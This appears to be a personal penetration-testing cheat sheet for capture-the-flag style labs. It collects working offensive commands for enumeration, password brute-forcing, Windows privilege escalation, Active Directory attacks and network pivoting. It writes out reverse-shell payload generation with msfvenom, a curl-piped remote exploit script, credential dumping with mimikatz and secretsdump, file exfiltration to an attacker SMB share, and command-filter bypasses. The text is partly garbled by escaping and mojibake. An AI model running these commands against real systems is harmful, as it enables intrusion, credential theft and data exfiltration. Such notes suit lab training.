\u0026#39;user\u0026#39; /root/.nxc/... 
or pass gpp=decrypt nmblookup -A [ip] smbmap -H [ip/hostname] nmap --script smb-enum-shares -p 139,445 [ip] smbclient -N \u0026#34;//$target/Replication\u0026#34; CrackMapExec # crackmapexec smb support.htb crackmapexec smb support.htb -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; crackmapexec winrm 10.129.6.151 -u support -p \u0026#39;Ironside47pleasure40Watchful\u0026#39; --\u0026gt; checks if winrm is allowed OpenSSL # openssl s_client -connect sequel.htb:3269 OpenSSL - Extracting the loot # oxdf@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt ls legacyy_dev_auth.* $ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt MSSQL # python mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@target -windows-auth or without windows auth EXEC xp_dirtree \u0026#39;\\\\10.10.14.137\\share\u0026#39;,1,1 activating xp_cmdshell EXECUTE sp_configure \u0026#39;show advanced options\u0026#39;, 1 RECONFIGURE EXECUTE sp_configure \u0026#39;xp_cmdshell\u0026#39;, 1 RECONFIGURE xp_cmdshell whoami transferring file sudo impacket-smbserver share . 
-smb2support enable_xp_cmdshell xp_cmdshell \u0026#34;copy C:\\inetpub\\wwwroot\\website-backup-27-07-23-old.zip \\\\\u0026lt;YOUR_KALI_IP\u0026gt;\\share\\backup.zip\u0026#34; or xp_cmdshell \u0026#34;cd C:\\inetpub\\wwwroot \u0026amp;\u0026amp; powershell -c python -m http.server 8000\u0026#34; Switching Users\nSELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = \u0026#39;IMPERSONATE\u0026#39; name -------------- hrappdb-reader SQL (HAERO\\discovery guest@master)\u0026gt; EXECUTE AS LOGIN = \u0026#39;hrappdb-reader\u0026#39; SQL (hrappdb-reader guest@master)\u0026gt; use hrappdb [*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb [*] INFO(DC\\SQLEXPRESS): Line 1: Changed database context to \u0026#39;hrappdb\u0026#39;. SQL (hrappdb-reader hrappdb-reader@hrappdb)\u0026gt; SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------- ---------- hrappdb dbo sysauth b\u0026#39;BASE TABLE\u0026#39; Postgres # psql -h 192.168.143.47 -p 5437 -U postgres MYSQL # mysql -h 127.0.0.1 -P 3306 -u tiffany -p\u0026#39;BackDropJ2024DS2024\u0026#39; instead of the terminator ; use \\G updating password UPDATE planning_user SET password=\u0026#39;df5b909019c9b1659e86e0d6bf8da81d6fa3499e\u0026#39; WHERE user_id=\u0026#39;ADM\u0026#39;; SNMP # snmp-check 10.10.10.10 snmpwalk -v2c -c public 10.129.230.96 -m all One thing to always check out is the running processes and their command lines. 
Process 1312 in my collection (will be different in others) is a sudo process:f snmpbulkwalk -v2c -c public ipaddr -m all | tee snmp.out grep SWRun snmp.out } grep 1222 SMTP # Verifying usernames\nsmtp-user-enum -M VRFY -U users.txt -t 192.169.139.140 RPC-client # rpcclient -U \u0026#34;\u0026#34; -N 10.10.10.172 querydispinfo GitDump # python3 -m venv venv source venv/bin/activate pip install PySocks,urllib3,dulwich,requests,bs4,requests-pkcs12 python git_dumper.py \u0026lt;http://siteisup.htb/dev/.git/\u0026gt; dumped_git git log git status git diff --cached Dockerfile.ghost grep -R \u0026#34;@dog.htb\u0026#34; * Inspect specific commits/files: git checkout \u0026lt;commit-id\u0026gt;: Switches your working directory to a specific commit ID to examine the state of files at that point in time. git show \u0026lt;commit-id\u0026gt;: Displays the changes introduced by a specific commit, including file contents and metadata. git diff \u0026lt;commit-id-1\u0026gt; \u0026lt;commit-id-2\u0026gt;: Shows the differences between two specific commits. Look for sensitive information within files: grep -r \u0026#34;password\u0026#34; .: Use grep to search the repository files for keywords like \u0026#34;password\u0026#34;, \u0026#34;API_key\u0026#34;, \u0026#34;credentials\u0026#34;, etc. 
LDAP \u0026amp; ldapdomaindump # ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; ldapsearch -H ldap://nagios.monitored.htb -x -s base namingcontexts ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; \u0026#34;(objectClass=user)\u0026#34; ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; \u0026#34;(objectClass=person)\u0026#34; nxc ldap 10.129.95.154 \\\\\\\\ -u Tiffany.Molina \\\\\\\\ -p \u0026#39;NewIntelligenceCorpUser9876\u0026#39; \\\\\\\\ --query \u0026#34;(objectClass=dnsNode)\u0026#34; \u0026#34;CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; ldapsearch -x -H ldap://10.129.95.154 \\\\\\\\ -D \u0026#34;Tiffany.Molina@intelligence.htb\u0026#34; \\\\\\\\ -w \u0026#39;NewIntelligenceCorpUser9876\u0026#39; \\\\\\\\ -b \u0026#34;CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; ldapdomaindump -u management.htb\\\\\\\\\\\\\\\\operator -p \u0026#39;operator\u0026#39; 10.10.11.236 -o ldap/ check domain_users_by_group.html http-proxy enumeration # #To scan itself on port 443 curl -i --proxy \u0026lt;http://192.168.113.189:3128\u0026gt; \u0026lt;http://192.168.113.189:443\u0026gt;#To scan itself on port 8000 curl -i --proxy \u0026lt;http://192.168.113.189:3128\u0026gt; \u0026lt;http://192.168.113.189:8000\u0026gt; 80 - HTTP (default) 443 - HTTPS (default secure) 8080 - Common alternative HTTP port (you found this!) 8000 - Alternative web server 8888 - Alternative web server 3000 - Node.js/React development servers 5000 - Flask/Python development servers 8443 - Alternative HTTPSAdmin/Management Interfaces:9090 - Cockpit, other admin panels 10000 - Webmin 8181 - GlassFish adminWindows Specific:5985 - WinRM HTTP 5986 - WinRM HTTPS gobuster dir -u http://192.168.139.189:8080 -w /usr/share/wordlists/dirb/common.txt --proxy http://192.168.139.189:3128 2. 
Credential Attacks # NXC # nxc ssh 10.10.11.58 -u users.txt -p \u0026#39;BackDrop\u0026#39; WPSCAN # wpsacn --url \u0026lt;http://internal.thm/wordpress\u0026gt; -U userlist.txt --passwords /usr/share/wordlists/rockyou.txt wordpress rev shell 404 TwentySeveneteen Theme editor Burp # After sending to intruder, add your payload positions Choose Cluserbomb attack load rockyou Hydra # SSH # hydra -L users.txt -P passwords.txt 192.168.122.122 ssh -t4 -vV hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb ssh hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://servmon.htb -t 4 -vV PHPMyAdmin Example # hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form \u0026#34;/db/index.php:password=^PASS^\u0026amp;remember=yes\u0026amp;login=Log+In\u0026amp;proc_login=true:Incorrect password\u0026#34; Rails Example # hydra -l admin -P passwords.txt facts.htb http-post-form \u0026#34;/admin/login:authenticity_token=TOKEN\u0026amp;user[username]=^USER^\u0026amp;user[password]=^PASS^:F=Invalid\u0026#34; Redirect Example # hydra -l admin -P rockyou.txt facts.htb http-post-form \u0026#34;/admin/login:authenticity_token=TOKEN\u0026amp;user[username]=^USER^\u0026amp;user[password]=^PASS^:S=/admin\u0026#34; FTP # hydra -L users.txt -P passwords.txt 192.x.x.x ftp wget -r ftp://Anonymous:pass@$IP cat * Normal Login Form # hydra -l info -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:F=error\u0026#34; \u0026#34;path:POSTDATA:FAILURE_STRING\u0026#34; --\u0026gt; format hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:F=Location\\\\\\\\: /loginError\u0026#34; **body failure string** hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 \\\\\\\\ http-post-form 
\u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:F=Username or Password incorrect\u0026#34; if success cond hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 \\\\\\\\ http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:S=Location\\\\\\\\: /\u0026#34; just match the substring in the response body form as the above dont work due to parsing the : hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:F=loginError\u0026#34; hydra -l dogBackDropSystem -P /usr/share/wordlists/rockyou.txt doghtb -s 80 http-post-form \u0026#34;/?q=user/login:name=^USER^\u0026amp;pass=^PASS^\u0026amp;form_build_id=form-qK3HdRXEJYejDODP5Q3MlHmOGr9o8x3B0ScS0suDm68\u0026amp;form_id=user_login\u0026amp;op=Log+in:F=Sorry, incorrect password\u0026#34;\u0026#34; hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p BackDropJ2024DS2024 dog.htb \\\\\\\\ http-post-form \u0026#34;/?q=user/login:name=^USER^\u0026amp;pass=^PASS^\u0026amp;form_build_id=form-qK3HdRXEJYejDODP5Q3MlHmOGr9o8x3B0ScS0suDm68\u0026amp;form_id=user_login\u0026amp;op=Log+in:F=Sorry, incorrect password\u0026#34; hydra -l admin@linkvortex.htb -P /usr/share/wordlists/rockyou.txt linkvortex.htb \\\\\\\\ http-post-form \u0026#34;/ghost/api/admin/session:{\\\\\\\\\u0026#34;username\\\\\\\\\u0026#34;:\\\\\\\\\u0026#34;^USER^\\\\\\\\\u0026#34;,\\\\\\\\\u0026#34;password\\\\\\\\\u0026#34;:\\\\\\\\\u0026#34;^PASS^\\\\\\\\\u0026#34;}:F=Invalid\u0026#34; hydra -C userpass streamio.htb https-post-form \u0026#34;/login.php:username=^USER^\u0026amp;password=^PASS^:F=failed\u0026#34; FFUF # ffuf -u \u0026lt;http://linkvortex.htb/ghost/api/admin/session\u0026gt; -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -H 
\u0026#34;X-Ghost-Version: 5.58\u0026#34; -H \u0026#34;Origin: \u0026lt;http://linkvortex.htb\u0026gt;\u0026#34; -H \u0026#34;Referer: \u0026lt;http://linkvortex.htb/ghost/\u0026gt;\u0026#34; -d \u0026#34;{\u0026#34;username\u0026#34;:\u0026#34;admin@linkvortex.htb\u0026#34;,\u0026#34;password\u0026#34;:FUZZ}\u0026#34; -w /usr/share/wordlists/rockyou.txt -fr \u0026#34;Your password is incorrect\u0026#34; ffuf -u \u0026#34;\u0026lt;http://$target/Account/login.aspx?Return\u0026gt;\u0026#34; -w /usr/share/wordlists/rockyou.txt -d \u0026#39;_VIEWSTATE=adfkajfkpajwfipjapfjawLgoinUSERPassword=FUZZ\u0026#39; -X POST -t 20 -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -r -fs 4466 ffuf -request request.txt -w /path/to/wordlist.txt ffuf -request request.txt -w users.txt:FUZZUSR -w passwords.txt:FUZZPW **Wrogn password stats** curl -s -X POST http://192.168.126.29/login.php \\ -d \u0026#34;user=admin\u0026#34; \\ -d \u0026#34;pass=thiswillneverwork123456789\u0026#34; \\ -d \u0026#34;submit=Login\u0026#34; | wc -c **Then â””â”€$ ffuf -u http://192.168.126.29/login.php \\ -X POST \\ -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; \\ -d \u0026#34;user=admin\u0026amp;pass=FUZZ\u0026amp;submit=Login\u0026#34; \\ -w /usr/share/wordlists/rockyou.txt \\ -fs 276 \\ -t 6 \\ -mc 200,302** Medusa # medusa -h 192.168.126.29 -u admin -P /usr/share/wordlists/rockyou.txt \\ -M http \\ -m FORM:/login.php \\ -m FORM-DATA:\u0026#34;ser=admin\u0026amp;pass=^PASS^\u0026amp;submit=Login\u0026#34; \\ -m DENY-SIGNAL:\u0026#34;Password incorrect.\u0026#34; \\ -T 4 CrackMapExec # crackmapexec winrm -u administrator -p tinkerbell -x \u0026#34;whoami\u0026#34; credspray netexec smb $target -u \u0026#39;userlist2.txt\u0026#39; -p \u0026#39;creds.txt\u0026#39; --continue-on-success John # john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt specify --form=NT when cracking NT hashes Hashcat # hashcat -m 5600 hash.txt rockyou.txt hashcat -m 0 
hashes.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt If you dont mention the mode then it goes in autodetect -m 7900 for msql drupal hashes 3. Exploitation # Windows PrivEsc Helpers # Certutil # certutil -urlcache -split -f \u0026#34;\u0026lt;http://example.com/file.exe\u0026gt;\u0026#34; [LocalPath] iwr http://192.168.45.159/winPEASany.exe -outfile winPEASany.exeb PrintSpoofer - Standard Windows 2019 # PrintSpoofer32.exe -i -c cmd.exe or powershell.exe Import-Module .\\\\\\\\\\\\\\\\Invoke-TokenManipulation.ps1 Invoke-TokenManipulation -CreateProcess \u0026#34;cmd.exe\u0026#34; -ImpersonateUser \u0026#34;NT AUTHORITY\\\\\\\\\\\\\\\\SYSTEM\u0026#34; WinExploitSuggester # python3 wes.py -u python3 wes.py sysinfo Mimikatz # Invoke-WebRequest \u0026lt;http://10.10.14.28:8081/mimikatz.exe\u0026gt; -OutFile C:\\\\\\\\\\\\\\\\Users\\\\\\\\\\\\\\\\Public\\\\\\\\\\\\\\\\mimikatz.exe must have SeDebug use Get-LocalUser to check if user availble locally first Get-LocalGroup privilege::debug token::elevate lsadump::sam sekurlsa::logonpasswords PowerUp.ps1 # wget PowerUp.ps1 -o PowerUp.ps1 . 
.\\\\\\\\PowerUp.ps1; Invoke-AllChecks AlwaysInstallElevated we can create a malicious msi payload and trigger it for an elevated sesion as it allows to run files with a high privileged user account msfvenom =p windows/x64/shell_reverse_tcp LHOST=10.13.31.108 LPORT=443 -f msi -o reverse,msi now lets prep the listener and run the executable msiexec /quiet /qn /i \\\\\\\\\\\\\\\\TSCLIENT\\\\\\\\share\\\\\\\\reverse.msi or msiexec /quiet /qn /i reverse.msi wget -useb 10.0.2.11/reverse.msi -o reverse.msi Invoke-AllChecks Invoke-ServiceAbuse -Name \u0026#39;AbyssWebServer\u0026#39; -UserName \u0026#39;dcorp\\\\\\\\studentx\u0026#39; -Verbose UAC Bypass # if we are part of the administrator group but have mandatory lervel medium Check if autoelevate is linked to this particular executable powershell -C Get-Content -Path C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\fodhelper.exe | findstr /I \u0026#34;autoElevate\u0026#34; or powershell -C Get-Content -Path C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\eventvwr.exe | findstr /I \u0026#34;autoElevate\u0026#34; PrintNightmare # Try this maybe it works sometimes wget -usebasicparsing 10.10.14.58/CVE-2021-1675.ps1 -o CVE-2021-1675.ps1 . 
.\\\\\\\\CVE-2021-1675.ps1;Invoke-Nightmare net user netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; --ntds impacket-psexec egostical-bank.local/administrator@target -hashes :8345adawdac Add User to Local Admin # net localgroup \u0026#34;administrators\u0026#34; adiaz /add Payloads / Generators # pwnkit # sh -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)\u0026#34; msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT=1234 -f asp \u0026gt; shell.asp msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe \u0026gt; destpath msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.54 LPORT=8220 -f exe -o revshell.exe SQLMAP # sqlmap -r req.txt --batch --level 3 --risk 2 . List all databases bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; --dbs 2. List tables in a specific database bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; -D \u0026lt;database_name\u0026gt; --tables 3. Dump all data from a specific database bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; -D \u0026lt;database_name\u0026gt; --dump 4. 
Dump specific table bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; -D \u0026lt;database_name\u0026gt; -T \u0026lt;table_name\u0026gt; --dumpsqlmap -u \u0026#34;\u0026lt;http://cctv.htb/zm/index.php?view=request\u0026amp;request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; \\\\\\\\ --cookie=\u0026#34;ZMSESSID=6lkqf49jhdfdo1l4nplp9m9o5\u0026#34; \\\\\\\\ -D zm -T Users -C Username,Password \\\\\\\\ --where=\u0026#34;Username=\u0026#39;mark\u0026#39;\u0026#34; \\\\\\\\ --dump --threads 10 --batch Filter Bypass Techniques # For white spaces we can use brace expansion :- {ping,-c,10.10.10.10}; or env variable, ${IFS} :- ping${IFS}-c${IFS}1 4. Active Directory # PowerView # . .\\Powerview.ps1 Enumeration $env:username$env:computername gets the comp name nd username Domain Enumeration Get-NetComputer ForEach-Object {$ip = Resolve-DNSName $*.name -ErrorAction SilentlyContinue Domain Enumeration Get-DomainUser -Identity (whoami) Current domain user Domain Enumeration Get-DomainUser Displays domain user info Domain User Enumeration Get-DomainUser select -ExpandProperty samaccountname Domain User Enumeration Get-DomainComputer select -ExpandProperty dnshostname Domain User Enumeration Get-DomainGroup -Identity \u0026ldquo;Domain Admins\u0026rdquo; Gets us the Domain Admins Groups details Domain User Enumeration Get-DomainGroupMember -Identity \u0026ldquo;Domain Adminsâ€ Gets us the members of the Domain Admin Group Domain User Enumeration Get-DomainGroupMember -Identity \u0026ldquo;Enterprise Admins\u0026rdquo; -Domain moneycorp.local Lists out the Enterprise admins, root domain is specified in the query DNS / GMSA # Adding A DNS Record # dnstool.py -u \u0026#39;intelligence\\\\\\\\Tiffany.Molina\u0026#39; -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web1 -d 10.10.14.137 -t GMSA DUMP # python gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d 
intelligence.htb -l 10.10.10.248 BloodHound # BloodHound Setup # sudo apt install -y neo4j sudo apt install -y openjdk-17-jdk sudo apt install -y bloodhound sudo /usr/share/neo4j/bin/neo4j-admin set-initial-password bloodhound Collection with bloodyad # bloodyAD -d secura.yzx -u Eric.Wallows -p \u0026#39;EricLikesRunning800\u0026#39; --host dc01.secura.yzx --dc-ip 192.168.122.97 --dns 192.168.122.97 A good mental model:\nd â†’ AD domain -host â†’ the DC you want to talk to -dc-ip â†’ DC IP if hostname resolution is flaky -dns â†’ DNS server to resolve AD names Collection # nxc ldap 192.168.122.97 -u Eric.Wallows -p \u0026#39;EricLikesRunning800\u0026#39; -d secura.yzx --dns-server 192.168.122.97 --bloodhound --collection All bloodhound-python -u user -p pass -d domain -ns DC_IP -c All bloodhound-python --dns-tcp -c ALL -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -d support.htb -ns 10.10.11.174 python3 /usr/bin/bloodhound-python --dns-tcp -ns 10.129.6.151 -d support.htb -u \u0026#39;ldap\u0026#39; -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -c all --zip Swtich from java 21 to java 17 sudo update-alternatives --config java viewing it sudo neo4j start **neo4j:neo4j** **OR collect w python and upload on the one i have in windows go TOOLS and use bloodhound from there after starting neo4j ./bin/neo4j start ./BloodHound --disable-gpu --no-sandbox** wget \u0026lt;https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound.exe\u0026gt; upload SharpHound.exe .\\\\\\\\SharpHound.exe -c All download \u0026lt;generated_zip_name\u0026gt; DOCKER # sudo apt update sudo apt install -y docker.io docker-compose sudo systemctl enable --now docker sudo usermod -aG docker $USER newgrp docker curl -L https://ghst.ly/getbhce | BLOODHOUND_PORT=8888 docker compose -f - up visit http://localhost:8888 username admin and temp password** **# Stop everything** docker stop $(docker ps -aq) docker rm $(docker ps -aq) **# Remove ALL 
related volumes (critical step)** docker volume rm $(docker volume ls -q | grep -E \u0026#34;(medtech|bloodhound|neo4j|postgres)\u0026#34;) 2\u0026gt;/dev/null || true docker volume prune -f **# Also remove any local data directories if they exist** sudo rm -rf ./medtech-data 2\u0026gt;/dev/null || true **** docker compose down -v OR use netexec netexec ldap $target -u \u0026#39;judith.mader\u0026#39; p judith09 --bloodhound --collection All --dns-server $target Update this password everytime u run just incase\nrMoKGf3jGTQEzVMzsNdPoehQHWuF635Q Sharphound if needed # cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 . iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1 powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All or with exe .\\SharpHound.exe -c All --Domain secura.yzx --DomainController 192.168.122.97 Rubeus # Rubeus.exe asktgt /user:administrator /certificate:C:\\\\\\\\\\\\\\\\programdata\\\\\\\\\\\\\\\\cert.pfx Certify / Certipy-ad # netexec ldap \u0026lt;DC_IP\u0026gt; -u user -p \u0026#39;password\u0026#39; -M adcs http://github.com/ly4k/Certipy/wiki/06â€”-Privilege-Escalation\npowershell -ep bypass -c \u0026#34;. 
.\\\\\\\\\\\\\\\\Certify.ps1; Invoke-Certify\u0026#34; use -hashes to pass hash certipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -vulnerable -stdout certipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -text -output certs Lets check for vulnerable templates\ncertipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -vulnerable -stdout certipy-ad find -u test@test.local -p \u0026#39;test\u0026#39; -dc-ip target -text -output certs cat -n certs_Certipy.txt | grep -iC4 \u0026#39;enrollment rights\u0026#39; | grep -viE \u0026#34;Enterprise Admins|Domain Admins|Domain Controllers\u0026#34; | fgrep -i \u0026#39;\\\\\\\\\u0026#39; Forge Certificate\ncertipy req -u \u0026#39;test@test.local\u0026#39; -p \u0026#39;test\u0026#39; -dc-ip \u0026#39;10.0.0.100\u0026#39; -target \u0026#39;CA.TEST.LOCAL\u0026#39; -ca \u0026#39;TEST-CA\u0026#39; -template \u0026#39;UserTemplate\u0026#39; -upn -Administrator@corp.local\u0026#39; Get Hash for specific user\ncertipy auth -pfx \u0026#39;administrator.pfx\u0026#39; -dc-ip \u0026#39;10.10.10.10\u0026#39; get shell with psexec next\nResponder # sudo responder -I tun0 NTLMtheft # python3 ntlm_theft.py -g lnk -s 192.168.45.160 -f vault upload vault and then impacket-smbserver test . 
-smb2support Enum4linux # enum4linux -a $target ASEP-ROASTING # impacket-GetNPUsers vulnnet-rst.local/ -dc-ip $target -usersfile usernames.txt -format john -outputfile hashes.txt john hashes.txt or with netexec\nnetexec ldap $target -u \u0026#39;users2\u0026#39; -p \u0026#39;\u0026#39; -k --dns-server $target netexec ldap $target -u \u0026#39;users2\u0026#39; -p \u0026#39;\u0026#39; -k --asreproast asrep.txt or --asrep hash john --wordlist=/usr/share/wordlists/rockyou.txt asrep.txt --format=krb5asrep Kerberoasting # impacket-GetUserSPNs -dc-ip $target \u0026#39;vulnet-rst.local/t-skid:tj072889=\u0026#39; -request â””â”€$ john --format=krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt hashcat -m 13100 timedatectl set-ntp off rdate -n $target or use --kerberoast impacket-getTGT \u0026#39;pirate.htb/MS01$:ms01\u0026#39; -dc-ip ipaddr if no creds and direct rce\ncertutil -urlcache -split -f http://192.168.x.x/Get-SPN.ps1 powershell -ExecutionPolicy Bypass .\\Get-SPN.ps1 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \u0026#39;MSSQLSvc/DC.access.offsec\u0026#39; **now we can kerberoast** powershell iwr http://192.168.45.177/Invoke-Kerberoast.ps1 -outfile Invoke-Kerberoast.ps1 .\\Invoke-Kerberoast.ps1 or Rubeus .\\\\Rubeus.exe kerberoast /outfile:kerberoast.hashes Kerbrute username eval # /home/kali/Desktop/Boxes/Administrator/kerbrute userenum --dc 10.129.16.174 -d manager.htb users2.txt Targeted Kerberoasting # source venv/bin/activate uv add --script targetedKerberoast.py -r requirements.txt sudo ntpdate administrator.htb uv run targetedKerberoast.py -v -d \u0026#39;administrator.htb\u0026#39; -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb or **python targetedKerberoast.py -v -d \u0026#39;administrator.htb\u0026#39; -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb** DNSrecon # dnsrecon -d \u0026#39;EGOTISTICAL_BANK.LOCAL\u0026#39; -n $target RID brute / Username Enum # git clone 
\u0026lt;https://github.com/mohinparamasivam/AD-Username-Generator\u0026gt; python3 [username-generate.py](\u0026lt;http://username-generate.py\u0026gt;) -u user -o generated.txt crackmapexec smb $target -u enterprise-core-vn -p \u0026#39;lalala\u0026#39; --rid-brute **try --users asw** try over different service like ldap asw or wmi or winrm , rdp guess GUEST netexec ldap $target -u lparker -p \u0026#39;password\u0026#39; --users one liner for pasting\nnetexec ldap $target -u \u0026#39;\u0026#39; -p \u0026#39;\u0026#39; --users | \u0026#39;{print$ 5}\u0026#39; | fgrep -v \u0026#39;[*]\u0026#39; | tee users2 netexec smb blackfield.local -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --rid-brute | grep \u0026#34;SidTypeUser\u0026#34; | awk -F\u0026#39;\\\\\\\\\\\\\\\\\u0026#39; \u0026#39;{print $2}\u0026#39; | awk \u0026#39;{print $1}\u0026#39; \u0026gt; users.txt PSEXEC / WMIEEXEC / PASSTHEHASH # rlwrap impacket-psexec vulnnet-rst.local/a-whitehat:bNdKVKjv@$target rlwrap impacket-wmiexec vulnnet-rst.local/a-whitehat:bnafajfa@$target rlwrap impacket-psexec egostical-bank.local/administrator@target -hashes :8345adawdac Secretsdump-DCSYNC # impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/whitehat:\u0026#39;akdfjakfaklf\u0026#39;@$target Checking smb w Creds # crackmapexec smb #target -u \u0026#39;ADministrator\u0026#39; -H or -P Checking smb Anon # netexec smb $target -u -p â€˜â€™ reveals host crackmapexec smb support.htb --shares WMI ANON # rpcclient -u \u0026#34;\u0026#34; -n $target enumdom users Shadow Creds w Certipy â€”\u0026gt; GenericAll # certipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account management_svc -H start with :NT part certipy-ad shadow auto \\\\\\\\ -u Olivia@administrator.htb \\\\\\\\ -p \u0026#39;ichliebedich\u0026#39; \\\\\\\\ -account michael \\\\\\\\ -dc-ip 10.129.16.22 \\\\\\\\ -target dc.administrator.htb if clock not synchronized then rdate -n $target rerun if certipy breaks and shows some nbefore error reinstall 
it sudo apt remove certipy-ad pip install --break-system-packages certipy-ad==4.8.2 PGP # gpg --decrypt credential.pgp if u see asc then gpg2john tryhackme.asc \u0026gt; hash.txt adn then john it Cadaver # cadaver http://192.168.45.159 5. Access and Pivoting # Check Routing Table # route print Switching Users # Runas\n. .\\Invoke-RunasCs.ps1 Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command cmd.exe -Remote 192.168.45.177:443 Discovery # route ip route netexec smb 10.0.2.0/24 or ips --\u0026gt; to discover the ips fping -qag 192.168.98.0/24 | tee ips or grab nmap ./nmap -V -sn 10.200.85.0/24 --open or cat /proc/net/lib_tne cat /proc/net/dev cat /proc/net/arp Access # sshuttle # sshuttle -r user@IP 10.129.4.0/24| chisel # ./chisel server -p 8000 --reverse ./chisel client \u0026lt;ATTACKER_IP\u0026gt;:8000 R:3306:127.0.0.1:3306 ./chisel client 10.10.14.66:8000 R:3306:127.0.0.1:3306 or chisel server -p 8081 --reverse || chisel server -p 8081 --reverse --socks5 ./chisel client 10.10.10.10:8081 R:socks || ./chisel client 10.10.10.10:8081 R:socks**5** make sure its gedit /etc/proxychains4.conf socks5 127.0.0.1 1080 now u can do proxychains -q \u0026lt;command\u0026gt; || proxychains -q nmap -sT \u0026lt;ipaddr\u0026gt; -p -Pn -v now over browser change proxy to socks 1080 localhost Socks5 Ligolo # Ligolo portforwarding\ngrab ligolo proxy and agent, proxy on the linux tar -xvf now grab windows agent cd c:\\\\windows\\\\tasks wget agent.exe -o agent.exe **sudo ./proxy -selfcert** then connect back from agent **.\\\\agent.exe -connect 10.0.0.12:11601 -ignore-cert listener_add --addr 0.0.0.0:9090 --to 127.0.0.1:8080** Ligolo Tunneling\nFind the network mask, for example, if your IP address is X.X.X.X and the subnet mask is Y.Y.Y.Y, the network will be X.X.X.X/ followed by the subnet prefix. For instance, with a subnet mask of 255.255.255.0, 